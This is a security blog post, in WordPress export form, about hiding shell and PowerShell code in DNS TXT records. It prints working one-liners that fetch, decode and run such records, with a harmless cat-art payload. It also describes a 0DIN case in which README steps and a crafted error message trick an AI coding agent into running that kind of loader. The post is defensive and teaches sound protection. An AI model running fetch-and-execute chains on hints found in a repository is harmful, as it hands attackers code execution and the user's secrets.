{"id":5102,"date":"2026-07-02T12:33:23","date_gmt":"2026-07-02T10:33:23","guid":{"rendered":"https:\/\/www.digitalnisebeobrana.cz\/?p=5102"},"modified":"2026-07-02T13:40:29","modified_gmt":"2026-07-02T11:40:29","slug":"code-hidden-in-dns-when-an-ai-agent-opens-the-door","status":"publish","type":"post","link":"https:\/\/www.digitalnisebeobrana.cz\/en\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/","title":{"rendered":"Code Hidden in DNS: When an AI Agent Opens the Door"},"content":{"rendered":"<p>Injecting malicious instructions into AI agents is a fairly new discipline. But many of the techniques used for it are not new at all.<\/p>\n<p>One of them is hiding code in DNS records. More specifically, in TXT records, which are meant for storing text data. TXT records are commonly used to prove that you control a domain, or to configure SPF, DKIM and DMARC for email. Technically, though, they can contain almost any text.<\/p>\n<p>And if a DNS record can contain ordinary text, it can also contain a command.<\/p>\n<p>For example, a command that gets executed in a shell after being loaded. In a harmless demo, it can print a message, create a file or display ASCII art. In a malicious version, it can open remote access to your machine.<\/p>\n<p>The important detail is this: the malicious code does not have to be stored in the repository at all. A static code scanner, a commit review or a quick human review may not see it, because the repository only contains a script that \u201cloads configuration from DNS\u201d. The actual payload appears only when the DNS record is read and its content is executed.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Demo\"><\/span>Demo<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>You can try this technique without using any malicious payload.<\/p>\n<p>The following example does not download anything, does not connect anywhere and only creates a file called <code>ds.txt<\/code> with a simple ASCII cat:<\/p>\n<pre><code> \/_\/\r\n( o.o )\r\n &gt; ^ &lt;\r\nDNS TXT says meow.<\/code><\/pre>\n<p>The point is not what the script does. The point is that the code is not stored in a file on disk, but in a DNS TXT record.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Linux_and_macOS\"><\/span>Linux and macOS<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>For Linux and macOS, the DNS TXT record can look like this:<\/p>\n<pre><code>txt-demo-sh.digitalnisebeobrana.cz TXT \"Y2F0ID4gZHMudHh0IDw8J0VPRicKIC9cXy9cCiggby5vICkKID4gXiA8CkROUyBUWFQgc2F5cyBtZW93LgpFT0YKY2F0IGRzLnR4dAo=\"<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"1_Show_the_script\"><\/span>1. Show the script<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This command reads the DNS TXT record, decodes it and prints the script:<\/p>\n<pre><code>dig +short TXT txt-demo-sh.digitalnisebeobrana.cz | tr -d '\"' | base64 -d<\/code><\/pre>\n<p>Output:<\/p>\n<pre><code>cat &gt; ds.txt &lt;&lt;'EOF'\r\n \/_\/\r\n( o.o )\r\n &gt; ^ &lt;\r\nDNS TXT says meow.\r\nEOF\r\ncat ds.txt<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"2_Run_the_demo\"><\/span>2. Run the demo<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This command does the same thing, but passes the decoded content directly to <code>bash<\/code>:<\/p>\n<pre><code>dig +short TXT txt-demo-sh.digitalnisebeobrana.cz | tr -d '\"' | base64 -d | bash<\/code><\/pre>\n<p>Result: a file called <code>ds.txt<\/code> is created in the current directory and its content is printed to the terminal.<\/p>\n<p>The mechanism is simple:<\/p>\n<pre><code>DNS TXT \u2192 Base64 \u2192 decoding \u2192 bash<\/code><\/pre>\n<p>In this demo, it only saves a harmless cat. The same principle could also write an SSH key, download another script, exfiltrate tokens or open a reverse shell.<\/p>\n<p>The problem is not DNS itself. The problem is mainly this part:<\/p>\n<pre><code>... | bash<\/code><\/pre>\n<p>It says: \u201cTake text that came from the outside and run it as a program.\u201d<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Windows_PowerShell\"><\/span>Windows \/ PowerShell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>On Windows, you can do something similar with PowerShell. The TXT record can contain a Base64-encoded PowerShell script:<\/p>\n<pre><code>txt-demo-ps.digitalnisebeobrana.cz TXT \"JGFydCA9IEAnCiAvXF8vXAooIG8ubyApCiA+IF4gPApETlMgVFhUIHNheXMgbWVvdy4KJ0AKU2V0LUNvbnRlbnQgLVBhdGggLlxkcy50eHQgLVZhbHVlICRhcnQgLUVuY29kaW5nIFVURjgKR2V0LUNvbnRlbnQgLlxkcy50eHQK\"<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"1_Show_the_script-2\"><\/span>1. Show the script<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This command reads the DNS TXT record, decodes it and prints the PowerShell script:<\/p>\n<pre><code>$s = ((Resolve-DnsName -Type TXT txt-demo-ps.digitalnisebeobrana.cz).Strings -join '')\r\n[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))<\/code><\/pre>\n<p>Output:<\/p>\n<pre><code>$art = @'\r\n \/_\/\r\n( o.o )\r\n &gt; ^ &lt;\r\nDNS TXT says meow.\r\n'@\r\nSet-Content -Path .ds.txt -Value $art -Encoding UTF8\r\nGet-Content .ds.txt<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"2_Run_the_demo-2\"><\/span>2. Run the demo<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This command does the same thing, but executes the decoded content directly:<\/p>\n<pre><code>$s = ((Resolve-DnsName -Type TXT txt-demo-ps.digitalnisebeobrana.cz).Strings -join '')\r\niex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))<\/code><\/pre>\n<p>Result: a file called <code>ds.txt<\/code> is created in the current directory and its content is printed to the terminal.<\/p>\n<p><code>iex<\/code> is short for <code>Invoke-Expression<\/code>. In other words: it takes text and runs it as PowerShell code.<\/p>\n<p>The mechanism is the same as with the shell:<\/p>\n<pre><code>DNS TXT \u2192 Base64 \u2192 decoding \u2192 PowerShell<\/code><\/pre>\n<p>A DNS TXT record does not look dangerous by itself. Base64 is not malware by itself. PowerShell is a normal administration tool. The risk appears when all of them are chained together and external content is executed automatically.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_0DIN_Showed\"><\/span>What 0DIN Showed<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Researchers from Mozilla 0DIN described an attack in which an AI agent was given a seemingly simple task: set up a downloaded repository.<\/p>\n<p>The repository did not need to contain obvious malware. The README offered a normal-looking first-time setup:<\/p>\n<pre><code>pip3 install -r requirements.txt\r\npython3 -m axiom init<\/code><\/pre>\n<p>At first glance, these are just two ordinary commands: install dependencies and initialize the project.<\/p>\n<p>The original write-up describes the attack as having three parts. That does not mean the user or the AI agent has to manually run three separate commands. It is better understood as three connected layers:<\/p>\n<ol>\n<li>a repository that looks trustworthy,<\/li>\n<li>an initialization routine that looks like a normal part of the setup,<\/li>\n<li>a setup script that loads the actual payload from a DNS TXT record and executes it.<\/li>\n<\/ol>\n<p>The command:<\/p>\n<pre><code>python3 -m axiom init<\/code><\/pre>\n<p>runs another setup script internally. That script queries DNS, reads a TXT record, decodes its content and passes it to the shell.<\/p>\n<p>An error message such as:<\/p>\n<pre><code>Axiom not initialised. Run: python3 -m axiom init<\/code><\/pre>\n<p>acts more like a fallback. If the agent ignores the README and tries to use the package without initialization, the package tells it to run the same command again as a normal fix.<\/p>\n<p>So there are two paths to the same result.<\/p>\n<p>The agent can follow the README:<\/p>\n<pre><code>pip install \u2192 init \u2192 DNS TXT \u2192 payload execution<\/code><\/pre>\n<p>Or it can skip the README, hit an error and then \u201cfix\u201d it:<\/p>\n<pre><code>pip install \u2192 error \u2192 suggested init \u2192 DNS TXT \u2192 payload execution<\/code><\/pre>\n<p>In both cases, the goal is the same: get the agent to run an initialization command that looks normal, but actually opens the path to an external payload.<\/p>\n<p>That is the uncomfortable part. Each individual step can look harmless. The problem appears when they are chained together.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Why_This_Matters_for_AI_Agents\"><\/span>Why This Matters for AI Agents<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>A human may at least pause when seeing a command like:<\/p>\n<pre><code>dig ... | base64 -d | bash<\/code><\/pre>\n<p>and ask: wait, why am I running something from DNS?<\/p>\n<p>AI agents often work differently. They are given a goal, such as \u201cget this project running\u201d, and then they try to solve whatever blocks them. If something fails, they read the README, an error message, an issue or a terminal hint, and try to continue.<\/p>\n<p>That is exactly their strength. And also their weakness.<\/p>\n<p>The agent does not have to be \u201chacked\u201d in a dramatic sense. It only has to be helpful enough. It runs the suggested command because it fits the task. And if it has access to a shell, the network and your working directory, the damage can be very practical:<\/p>\n<ul>\n<li>leaking API tokens,<\/li>\n<li>leaking SSH keys,<\/li>\n<li>accessing private repositories,<\/li>\n<li>reading configuration files,<\/li>\n<li>accessing cloud credentials,<\/li>\n<li>running additional code,<\/li>\n<li>opening a reverse shell.<\/li>\n<\/ul>\n<p>In other words: this is not only \u201cAI security\u201d. It is classic developer workstation security, accelerated and amplified by an AI agent.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Will_Antivirus_or_a_Firewall_Stop_It\"><\/span>Will Antivirus or a Firewall Stop It?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I would not rely on that.<\/p>\n<p>A normal repository scan may not find anything suspicious, because the real payload is not in the repository. It is in DNS.<\/p>\n<p>Antivirus may also miss it if it only sees normal tools: Python, shell, <code>dig<\/code>, PowerShell, a DNS query. And firewalls often allow DNS traffic, because ordinary internet use breaks very quickly without DNS.<\/p>\n<p>That does not mean defense is impossible. Good EDR, process monitoring, blocking suspicious child processes, limiting outbound traffic or detecting suspicious chains such as <code>base64 | bash<\/code> and <code>Invoke-Expression<\/code> can help.<\/p>\n<p>It is just not a good idea to rely on them as the only protection.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"How_to_Defend_Against_It\"><\/span>How to Defend Against It<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The basic rule is simple: an unknown repository is unknown code. And that is still true when an AI agent opens it for you.<\/p>\n<p>In practice, that means:<\/p>\n<ul>\n<li>Do not blindly run setup scripts from unknown projects.<\/li>\n<li>Do not treat an AI agent\u2019s recommendation as a security review.<\/li>\n<li>Be careful with constructs such as <code>curl | bash<\/code>, <code>wget | bash<\/code>, <code>dig | bash<\/code>, <code>base64 -d | bash<\/code>, <code>bash -c \"$something\"<\/code> or PowerShell <code>Invoke-Expression<\/code>.<\/li>\n<li>Check not only the command being executed, but also what it loads at runtime.<\/li>\n<li>Run unknown projects in isolation: a container, VM, throwaway user, devcontainer or sandbox.<\/li>\n<li>Do not give AI agents unnecessarily broad permissions.<\/li>\n<li>Do not keep production tokens, SSH keys, cloud credentials or other long-lived secrets available in the environment.<\/li>\n<li>Limit outbound traffic from development environments where it makes sense.<\/li>\n<li>Disable or heavily restrict automatic approval of shell commands in AI coding agents.<\/li>\n<li>Treat README files, error messages, issues and documentation in unknown repositories as untrusted input, not as authoritative instructions.<\/li>\n<\/ul>\n<p>A good control question is:<\/p>\n<blockquote>\n<p>Can I actually see all the code that will run?<\/p>\n<\/blockquote>\n<p>If a command downloads something, reads from DNS, builds code from variables, decodes Base64 or pipes data into a shell, the answer is often: no, I cannot.<\/p>\n<p>At that point, it is no longer \u201cjust setup\u201d.<\/p>\n<p>It is remote code execution with the privileges of a user who often has far more sensitive things on their machine than they realize.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Summary\"><\/span>Summary<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>DNS TXT records are not dangerous by themselves. Base64 is not dangerous by itself. AI agents are not dangerous by themselves either.<\/p>\n<p>The problem appears when these things are combined:<\/p>\n<pre><code>trustworthy-looking project\r\n+ helpful AI agent\r\n+ shell with too much access\r\n+ externally loaded payload\r\n= problem<\/code><\/pre>\n<p>So it is worth repeating an old rule in a new form:<\/p>\n<blockquote>\n<p>Do not copy random commands from the internet into your terminal.<br \/>\n  And do not let your AI agent do it either.<\/p>\n<\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Sources\"><\/span>Sources<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<ul>\n<li><a href=\"https:\/\/0din.ai\/blog\/clone-this-repo-and-i-own-your-machine\">Mozilla 0DIN: Clone This Repo and I Own Your Machine<\/a><\/li>\n<li><a href=\"https:\/\/datatracker.ietf.org\/doc\/html\/rfc1464\">RFC 1464: Using the Domain Name System To Store Arbitrary String Attributes<\/a><\/li>\n<li><a href=\"https:\/\/www.ietf.org\/rfc\/rfc1035.txt\">RFC 1035: Domain Names &#8211; Implementation and Specification<\/a><\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/en-us\/powershell\/module\/dnsclient\/resolve-dnsname\">Microsoft Learn: Resolve-DnsName<\/a><\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.core\/about\/about_powershell_exe\">Microsoft Learn: about_PowerShell_exe<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Code does not have to be hidden directly in a repository. It can be loaded at runtime from something as ordinary as a DNS TXT record. This demo uses a harmless payload to show why that becomes risky when helpful AI agents automatically run setup commands.<\/p>\n","protected":false},"author":1,"featured_media":5106,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"categories":[1,111,75,18,110,37],"tags":[121,113,27,114],"class_list":["post-5102","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-ai","category-hacky","category-nastroje","category-promptpunk","category-techniky-hackeru","tag-agent","tag-ai","tag-hackeri","tag-vibe-coding"],"translation":{"provider":"WPGlobus","version":"3.0.6","language":"en","enabled_languages":["cs","en"],"languages":{"cs":{"title":true,"content":true,"excerpt":true},"en":{"title":true,"content":true,"excerpt":true}}},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Code Hidden in DNS: When an AI Agent Opens the Door - DIGITAL SELF-DEFENSE<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Code Hidden in DNS: When an AI Agent Opens the Door - DIGITAL SELF-DEFENSE\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/\" \/>\n<meta property=\"og:site_name\" content=\"DIGITAL SELF-DEFENSE\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/digitalnisebeobrana\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/digitalnisebeobrana\/\" \/>\n<meta property=\"article:published_time\" content=\"2026-07-02T10:33:23+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-07-02T11:40:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/07\/dns-agent-1024x576.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"576\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Milan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@sodomak\" \/>\n<meta name=\"twitter:site\" content=\"@sodomak\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Milan\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/\"},\"author\":{\"name\":\"Milan\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\"},\"headline\":\"Code Hidden in DNS: When an AI Agent Opens the Door\",\"datePublished\":\"2026-07-02T10:33:23+00:00\",\"dateModified\":\"2026-07-02T11:40:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/\"},\"wordCount\":3009,\"publisher\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\"},\"image\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/dns-agent.png\",\"keywords\":[\"agent\",\"AI\",\"hacke\u0159i\",\"vibe-coding\"],\"articleSection\":[\"Blog\",\"AI\",\"hacky\",\"n\u00e1stroje\",\"Promptpunk\",\"Techniky hacker\u016f\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/\",\"name\":\"Code Hidden in DNS: When an AI Agent Opens the Door - DIGITAL SELF-DEFENSE\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/dns-agent.png\",\"datePublished\":\"2026-07-02T10:33:23+00:00\",\"dateModified\":\"2026-07-02T11:40:29+00:00\",\"description\":\"K\u00f3d nemus\u00ed b\u00fdt schovan\u00fd p\u0159\u00edmo v repozit\u00e1\u0159i. M\u016f\u017ee se na\u010d\u00edst a\u017e za b\u011bhu t\u0159eba z DNS TXT z\u00e1znamu. Uk\u00e1zka na ne\u0161kodn\u00e9m payloadu vysv\u011btluje, pro\u010d je to probl\u00e9m hlavn\u011b u AI agent\u016f, kte\u0159\u00ed ochotn\u011b spou\u0161t\u011bj\u00ed setup p\u0159\u00edkazy.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/dns-agent.png\",\"contentUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/07\\\/dns-agent.png\",\"width\":1672,\"height\":941},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Code Hidden in DNS: When an AI Agent Opens the Door\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/\",\"name\":\"DIGITAL SELF-DEFENSE\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\",\"name\":\"Milan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\",\"contentUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\",\"width\":613,\"height\":73,\"caption\":\"Milan\"},\"logo\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\"},\"description\":\"Jmenuji se Milan P\u016flkr\u00e1bek, pamatuji si po\u010d\u00edta\u010de bez internetu, Internet bez Google a mobiln\u00ed komunikaci bez \u0161ifrov\u00e1n\u00ed. M\u00e1m za sebou v\u00edce ne\u017e dvacet let profesion\u00e1ln\u00ed praxe v IT, p\u0159edn\u00e1\u0161\u00edm a p\u00ed\u0161u \u010dl\u00e1nky o IT bezpe\u010dnosti, kryptom\u011bn\u00e1ch a nov\u00fdch technologi\u00edch. Od roku 2014 jsem sou\u010d\u00e1st\u00ed nezikov\u00e9 organizace Paraleln\u00ed Polis v Praze.\",\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/digitalnisebeobrana\\\/\",\"https:\\\/\\\/x.com\\\/sodomak\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Code Hidden in DNS: When an AI Agent Opens the Door - DIGITAL SELF-DEFENSE","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/","og_locale":"en_US","og_type":"article","og_title":"Code Hidden in DNS: When an AI Agent Opens the Door - DIGITAL SELF-DEFENSE","og_url":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/","og_site_name":"DIGITAL SELF-DEFENSE","article_publisher":"https:\/\/www.facebook.com\/digitalnisebeobrana\/","article_author":"https:\/\/www.facebook.com\/digitalnisebeobrana\/","article_published_time":"2026-07-02T10:33:23+00:00","article_modified_time":"2026-07-02T11:40:29+00:00","og_image":[{"width":1024,"height":576,"url":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/07\/dns-agent-1024x576.png","type":"image\/png"}],"author":"Milan","twitter_card":"summary_large_image","twitter_creator":"@sodomak","twitter_site":"@sodomak","twitter_misc":{"Written by":"Milan","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#article","isPartOf":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/"},"author":{"name":"Milan","@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736"},"headline":"Code Hidden in DNS: When an AI Agent Opens the Door","datePublished":"2026-07-02T10:33:23+00:00","dateModified":"2026-07-02T11:40:29+00:00","mainEntityOfPage":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/"},"wordCount":3009,"publisher":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736"},"image":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#primaryimage"},"thumbnailUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/07\/dns-agent.png","keywords":["agent","AI","hacke\u0159i","vibe-coding"],"articleSection":["Blog","AI","hacky","n\u00e1stroje","Promptpunk","Techniky hacker\u016f"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/","url":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/","name":"Code Hidden in DNS: When an AI Agent Opens the Door - DIGITAL SELF-DEFENSE","isPartOf":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#primaryimage"},"image":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#primaryimage"},"thumbnailUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/07\/dns-agent.png","datePublished":"2026-07-02T10:33:23+00:00","dateModified":"2026-07-02T11:40:29+00:00","description":"K\u00f3d nemus\u00ed b\u00fdt schovan\u00fd p\u0159\u00edmo v repozit\u00e1\u0159i. M\u016f\u017ee se na\u010d\u00edst a\u017e za b\u011bhu t\u0159eba z DNS TXT z\u00e1znamu. Uk\u00e1zka na ne\u0161kodn\u00e9m payloadu vysv\u011btluje, pro\u010d je to probl\u00e9m hlavn\u011b u AI agent\u016f, kte\u0159\u00ed ochotn\u011b spou\u0161t\u011bj\u00ed setup p\u0159\u00edkazy.","breadcrumb":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#primaryimage","url":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/07\/dns-agent.png","contentUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/07\/dns-agent.png","width":1672,"height":941},{"@type":"BreadcrumbList","@id":"https:\/\/www.digitalnisebeobrana.cz\/code-hidden-in-dns-when-an-ai-agent-opens-the-door\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.digitalnisebeobrana.cz\/"},{"@type":"ListItem","position":2,"name":"Code Hidden in DNS: When an AI Agent Opens the Door"}]},{"@type":"WebSite","@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#website","url":"https:\/\/www.digitalnisebeobrana.cz\/en\/","name":"DIGITAL SELF-DEFENSE","description":"","publisher":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.digitalnisebeobrana.cz\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736","name":"Milan","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png","url":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png","contentUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png","width":613,"height":73,"caption":"Milan"},"logo":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png"},"description":"Jmenuji se Milan P\u016flkr\u00e1bek, pamatuji si po\u010d\u00edta\u010de bez internetu, Internet bez Google a mobiln\u00ed komunikaci bez \u0161ifrov\u00e1n\u00ed. 